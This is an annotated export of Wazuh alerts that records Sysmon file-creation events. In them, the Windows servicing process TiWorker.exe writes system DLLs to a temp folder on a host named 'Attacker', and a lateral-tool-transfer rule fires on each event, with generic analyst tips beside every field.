id: 1745534154.679192 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2182589Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260605 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.217
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-base-util-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.217
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.217 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-base-util-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.217 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 21 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.682282 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2214364Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260606 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.219
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-com-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.219
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.219 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-com-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.219 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 22 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.685368 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2240171Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260607 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.222
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-comm-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.222
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.222 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-comm-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.222 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 23 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.688458 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2260495Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260608 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.224
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-console-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.224
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-console-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 24 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.691560 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2285695Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260609 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.226
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-datetime-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.226
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.226 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-datetime-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.226 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 25 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.694666 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2312480Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260610 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.231
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-datetime-l1-1-1.dll
CreationUtcTime: 2025-04-20 01:55:28.228
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.231 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-datetime-l1-1-1.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.228 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 26 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.697772 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2331969Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260611 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.231
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-debug-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.231
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.231 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-debug-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.231 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
